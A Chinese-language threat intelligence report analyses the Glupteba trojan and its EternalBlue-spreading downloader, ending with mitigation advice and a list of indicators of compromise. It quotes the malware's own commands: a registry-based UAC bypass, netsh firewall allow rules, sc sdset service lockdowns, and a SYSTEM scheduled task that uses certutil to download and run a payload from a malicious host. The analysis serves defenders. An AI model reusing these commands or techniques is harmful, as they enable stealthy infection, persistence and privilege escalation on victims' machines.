0×1 概述
近日騰訊御見威脅情報中心監測到大量下載Glupteba惡意代理木馬。不同以往的是,該惡意木馬并未通過Operation Windigo僵尸網絡進行傳播,而是通過其他的木馬下載器(Scheduled.exe)進行傳播。進一步溯源分析發現,該木馬下載器利用“永恒之藍”漏洞進行傳播,從而導致了該木馬的感染量的激增。
Glupteba木馬會繞過UAC,以管理員權限和系統權限運行,會創建防火墻策略,將木馬程序加入白名單;修改Windows Defender策略,將木馬程序添加到病毒查殺白名單。木馬會收集中毒電腦的隱私信息,利用中毒電腦挖礦。
0×2 詳細分析
Scheduled.exe分析:
scheduled.exe首先申請空間,釋放PE文件執行。將釋放的PE dump出來,發現是golang編寫的,利用IDA python腳本將函數重命名。釋放的PE首先執行寫入配置信息到注冊表HEKY_CURRENT_USER/Software/Microsoft/TestApp中。
寫入配置信息
然后判斷是否是管理員權限,如果不是,則利用寫注冊表
"HKCU\Software\Classes\mscfile\shell\open\command"
然后通過啟動CompMgmtLauncher繞過UAC以管理員權限重新啟動自己。
運行CompMgmtLauncher
重啟后再判斷是否是系統權限,如果不是則通過以TrustedInstaller運行自己提高權限。
以TrustedInstaller運行
判斷自己路徑名是否是”C:\Windows\rss\csrss.exe”,如果不是則執行安裝邏輯。
首先會判斷是否在虛擬機中運行。
檢查VirtualBox
然后添加防火墻策略,并設置注冊表配置firewall鍵值為1,將程序啟動加入Windows防火墻的白名單。
cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\admin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes"
創建其他釋放文件相關目錄,并寫入注冊表
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\”的paths和processs下的子健。并且設置注冊表配置defender鍵值為1。
創建目錄文件夾
最后將自身移動到”C:\Windows\rss\”下,重命名”csrss.exe”,設置文件夾隱藏,并設置注冊表Software\Microsoft\Windows\CurrentVersion\RUN,最后重新啟動csrss.exe。
設置自啟
重啟后再向服務器注冊bot將服務器返回數據再寫入注冊表配置UUID(后續下載的CloudNet啟動需要)。
注冊bot
注冊bot完成后創建兩個任務分別用于執行自己和更新自己。
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f http://dp.fastandcoolest.com/scheduled.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
然后再釋放3個sys文件和1個exe文件到目標目錄設置隱藏屬性,并加載驅動和exe。”C:\Windows\System32\drivers\”下釋放三個隱藏sys文件:
Winmon.sys用于隱藏對應PID進程。
WinmonFS.sys隱藏指定文件或目錄。
WinmonProcessMonitor.sys查找指定進程,并關閉。
WinmonFS.sys隱藏文件
C:\Windows\下釋放一個exe文件:
Windefender.exe
添加規則到windows defender。
cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
cmd.exe /C sc sdset WinmonFS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)cmd.exe /C sc sdset WinmonProcessMonitor D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
添加完規則后,會將服務器返回cloudnet.exe下載地址”http[:]//skynetstop.com/cloudnet.exe”寫入到注冊表配置信息中的CloudenetSource中,然后開啟6個線程。
創建線程
6個線程分別作用是:
1.監測服務更新
2.監測保護CloudNet
3.監測保護Defender
4.下載礦機和挖礦代理配置信息
5.監測全屏窗口時則下載其他軟件安裝
6.獲取掩碼利用永恒之藍攻擊局域網機器
第三方軟件下載器
下載竊取瀏覽器個人數據插件
礦機
永恒之藍payload模塊下載app.exe
開啟線程后,再等待服務器指令,執行其他功能,例如上傳下載執行等功能。
部分功能函數
Windefender.exe分析:
windefender.exe同樣是由golang編寫,首先將自己寫入windows defender規則。
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
然后獲取注冊表配置信息CloudenetSource,去下載執行Cloudnet.exe。
下載Cloudnet.exe
Cloudnet分析:
首先讀取注冊表配置信息中的UUID并校檢。
讀取UUID
移動自己到目的文件夾下。
移動自身
寫注冊表自啟動后繼續在注冊表
“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下寫入文件版本信息,路徑等信息。
設置自啟
設置注冊表完后,會訪問www.google.com判斷是否聯網,隨后在從100條硬編碼中隨機選擇一條并解密生成拼接成c2服務器。向該c2服務器發送信息。
第一次發送信息
隨后會繼續向c2服務器發送更詳細的本地信息。
第二次發送本地信息
隨后服務器會向受害機器發送驗證通信信息。
bot與C2認證
e為服務器向受害者機器發送的控制指令。
接收指令執行
0×3 關聯分析
分析發現,cloudnet.exe原來是Glupteba惡意木馬,Glupteba惡意木馬作為Operation Windigo組織用于部署僵尸網絡中的一部分首次出現,Operation Windigo組織通過Glupteba創建代理分發垃圾郵件。
此次發現的Glupteba雖然功能沒有太大變化,但是與以往通過Operation Windigo基礎設施分發下載不同,而是利用其他惡意木馬進行分發下載,并且作為主模塊使用,我們有理由相信Glupteba脫離Operation Windigo,成為自己僵尸網絡的一部分。
觀察過程中目前尚未發現Glupteba有其他動作,不排除僵尸網絡背后的操縱者出售地下代理服務,可用于垃圾郵件分發或者網絡攻擊等行為。
0×4 解決方案
騰訊御見威脅情報中心提醒用戶注意以下幾點:
1、服務器關閉不必要的端口,方法可參考:https://guanjia.qq.com/web_clinic/s8/585.html
2、推薦企業用戶安裝御點終端安全管理系統(https://s.tencent.com/product/yd/index.html)。御點終端安全管理系統具備終端殺毒統一管控、修復漏洞統一管控,以及策略管控等全方位的安全管理功能,可幫助企業管理者全面了解、管理企業內網安全狀況、保護企業安全。
IOC
C2:
https[:]//blumbergnew.com
https[:]//fastandcoolest.com
https[:]//mihan14500.com
https[:]//lentanewsland.com
http[:]//skynetstop.com
http[:]//gb1.wupdomain.com
http[:]//dp.fastandcoolest.com
http[:]//F0AE5A04-264A-432E-BC59-2DEDBC05E96E.server-3.0df.ru
http[:]//e8ebf79d-5dd2-4d98-9c45-e3231e8cc26c.server-17.0m1.ru
URL:
http[:]//dp.fastandcoolest.com/app/4/app.exe
http[:]//dp.fastandcoolest.com/scheduled.exe
http[:]//gb1.wupdomain.com/xme64-252.exe
http[:]//dp.fastandcoolest.com/deps.zip
http[:]//dp.fastandcoolest.com/app/3/app.exe
http[:]//dp.fastandcoolest.com/app.exe
http[:]//gb1.wupdomain.com/xme32-252-gcc.exe
http[:]//dp.fastandcoolest.com/thirdparty/lsa64install.exe
http[:]//dp.fastandcoolest.com/scheduled/3/scheduled.exe
http[:]//dp.fastandcoolest.com/ps.exe
http[:]//dp.fastandcoolest.com/mrt.exe
http[:]//dp.fastandcoolest.com/vc.exe
| 
